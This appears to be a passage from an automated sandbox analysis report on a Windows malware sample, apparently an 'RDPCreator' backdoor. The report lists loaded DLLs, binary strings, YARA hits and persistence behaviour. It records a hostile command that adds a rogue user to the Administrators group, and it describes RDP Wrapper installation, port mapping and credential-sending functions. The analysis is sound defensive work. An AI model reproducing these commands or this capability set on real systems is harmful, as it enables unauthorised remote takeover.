                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: termsrv.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile written: C:\Program Files\RDP Wrapper\rdpwrap.iniJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP WrapperJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.iniJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to behavior
                            Source: 67065b4c84713_Javiles.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: 67065b4c84713_Javiles.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: 67065b4c84713_Javiles.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed source: 67065b4c84713_Javiles.exe
                            Source: Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000009.00000000.1765908730.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: <>c__DisplayClass0_0<>9__5_0<GetTotalDiskSpace>b__5_0<GenerateRandomPassword>b__0<>u__1Nullable`1IEnumerable`1Task`1TaskAwaiter`1ToInt32<faker>5__2<>u__2Func`2Dictionary`2ToInt64<Main>d__4<>9<Module><Main>GetTotalRAMSystem.IOGetPublicIP_Costuracostura.metadatamscorlibset_Verb<>cSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.bogus.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedReadToEndExecuteCommandcommandFindGenerateRandomPasswordpasswordReplaceGetTotalDiskSpaceNatDeviceCancellationTokenSourcesourceCompressionModeRangeExchangenullCacheInvokeIEnumerableIDisposableget_AsyncWaitHandleDownloadFileIsInRoleWindowsBuiltInRoleget_MainModuleProcessModuleGetOSNameGetGPUNameget_Nameget_FileNameset_FileNameget_MachineNamefullNameGetAdminGroupNameuserNameGetProcessorNameGetNameLastNameFirstNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValuedriveadd_AssemblyResolveRDPCreator.exeSystem.ThreadingSystem.Runtime.VersioningMappingDownloadStringCultureToStringAttachzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockget_TaskSystem.Security.PrincipalWindowsPrincipalProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamProgramget_Itemset_ItemSystemTrimRandomrandomSumTimeSpanIsPortOpenget_ChildrenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionManagementObjectCollectionset_PositionSetExceptionStringComparisonpatternCopyToget_CultureInfoSystemInfoProcessStartInfoAddUserToAdminGroupAddUserToRemoteDesktopGroupSystem.LinqStreamReaderTextReaderAssemblyLoaderAsyncTaskMethodBuilder<>t__builderGendersenderManagementObjectSearcherFakerResolveEventHandlerRDPInstallerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreatorIsRunAsAdministrator.ctor.cctorMonitorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesSystem.DirectoryServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesDirectoryEntriesresourceNamessymbolNamesassemblyNamesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsSystem.Collectionsget_CharsGetCurrentProcessBogus.DataSetsSystem.Net.SocketsExistsBogusOpen.NatConcatManagementBaseObjectManagementObjectSelectBeginConnectGetSystem.NetWaitForExitFirstOrDefaultIAsyncResultGetResultSetResultToLowerInvariantWebClien
                            Source: Binary string: costura.costura.pdb.compressed source: 67065b4c84713_Javiles.exe
                            Source: Binary string: rdpclip.pdbJ source: RDPWInst.exe, 00000009.00000000.1765908730.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: RfxVmt.pdb source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002B4B000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000009.00000000.1765908730.0000000000450000.00000002.00000001.01000000.00000008.sdmp, rfxvmt.dll.9.dr, RDPWInst.exe.0.dr
                            Source: Binary string: /_/Source/Bogus/obj/Release/net40/Bogus.pdb source: 67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: rdpclip.pdb source: RDPWInst.exe, 00000009.00000000.1765908730.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: RfxVmt.pdbGCTL source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002B4B000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000009.00000000.1765908730.0000000000450000.00000002.00000001.01000000.00000008.sdmp, rfxvmt.dll.9.dr, RDPWInst.exe.0.dr
                            Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: 67065b4c84713_Javiles.exe
                            Source: Binary string: C:\DEV\C#\RDPCreator\RDPCreator\obj\Release\RDPCreator.pdb source: 67065b4c84713_Javiles.exe
                            Source: Binary string: /_/Source/Bogus/obj/Release/net40/Bogus.pdbSHA256v0& source: 67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            Source: 67065b4c84713_Javiles.exe, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                            Source: Yara matchFile source: 67065b4c84713_Javiles.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.67065b4c84713_Javiles.exe.480000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1703967641.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2171643627.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 67065b4c84713_Javiles.exe PID: 7480, type: MEMORYSTR
                            Source: 67065b4c84713_Javiles.exeStatic PE information: 0xEF5ACDDE [Tue Apr 2 01:46:06 2097 UTC]
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_004430DC push 00443161h; ret 9_2_00443159
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_00439674 push ecx; mov dword ptr [esp], ecx9_2_00439675
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_00420164 push 004201DAh; ret 9_2_004201D2
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_0040A178 push 0040A1E7h; ret 9_2_0040A1DF
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_00437134 push 00437201h; ret 9_2_004371F9
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_00443188 push 00443230h; ret 9_2_00443228
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_0043421C push ecx; mov dword ptr [esp], edx9_2_0043421E
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_0044323C push 004432C7h; ret 9_2_004432BF
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_00437298 push 0043732Eh; ret 9_2_00437326
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_00437360 push 004373ADh; ret 9_2_004373A5
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_0043A3F8 push 0043A450h; ret 9_2_0043A448
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_004176D4 push 00417879h; ret 9_2_00417871
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_00421998 push 004219E5h; ret 9_2_004219DD
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_0042AA70 push ecx; mov dword ptr [esp], edx9_2_0042AA75
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_0040CA10 push eax; retf 0040h9_2_0040CA11
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_0042AAB4 push ecx; mov dword ptr [esp], edx9_2_0042AAB9
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_00415C58 push ecx; mov dword ptr [esp], edx9_2_00415C5D
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_0040EC80 push ecx; mov dword ptr [esp], ecx9_2_0040EC85
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_00404E0C push eax; ret 9_2_00404E48
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_0043FE8C push 0043FEE0h; ret 9_2_0043FED8
                            Source: 67065b4c84713_Javiles.exeStatic PE information: section name: .text entropy: 7.996881182641007

                            Persistence and Installation Behavior

                            barindex
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" JustonThompson /add
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" JustonThompson /addJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeFile created: C:\Users\user\AppData\Local\Temp\RDPWInst.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Windows\System32\rfxvmt.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Windows\System32\rfxvmt.dllJump to dropped file
                            Source: C:\Windows\System32\drivers\tsusbhub.sysRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\WdfJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\ParametersJump to behavior
